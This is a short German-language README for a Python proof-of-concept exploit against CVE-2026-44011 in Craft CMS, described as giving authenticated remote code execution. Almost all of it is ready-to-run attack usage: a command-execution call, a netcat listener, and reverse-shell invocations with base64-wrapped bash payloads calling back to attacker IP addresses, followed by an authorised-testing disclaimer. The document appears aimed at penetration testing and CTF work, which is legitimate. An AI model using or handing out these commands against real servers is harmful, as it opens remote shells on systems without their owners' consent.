
Python-Proof-of-Concept für CVE-2026-44011 in Craft CMS, das authentifizierte Remote-Code-Ausführung mit Befehlsausführung und base64-verpackten Reverse-Shell-Payloads ausnutzt.
CVE-2026-44011-craft-rce-poc Verwendung
Einzelner Befehl: bash
python3 craft_rce.py -b http://target -u USER -p PASS -c 'id'
Reverse Shell (base64-verpackte Bash):
nc -lvnp 4444
python3 craft_rce.py -b http://target -u USER -p PASS --revshell 10.10.14.213 4444
Wenn das Ziel Ihren Callback nicht erreichen kann, richten Sie ihn explizit aus:
python3 craft_rce.py -b http://target -u USER -p PASS --revshell 10.13.37.200 4444 -H 10.13.37.200 --listen-port 35509
Haftungsausschluss
Nur für autorisierte Tests, CTFs und Laborumgebungen. Nicht gegen Systeme verwenden, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zum Testen haben.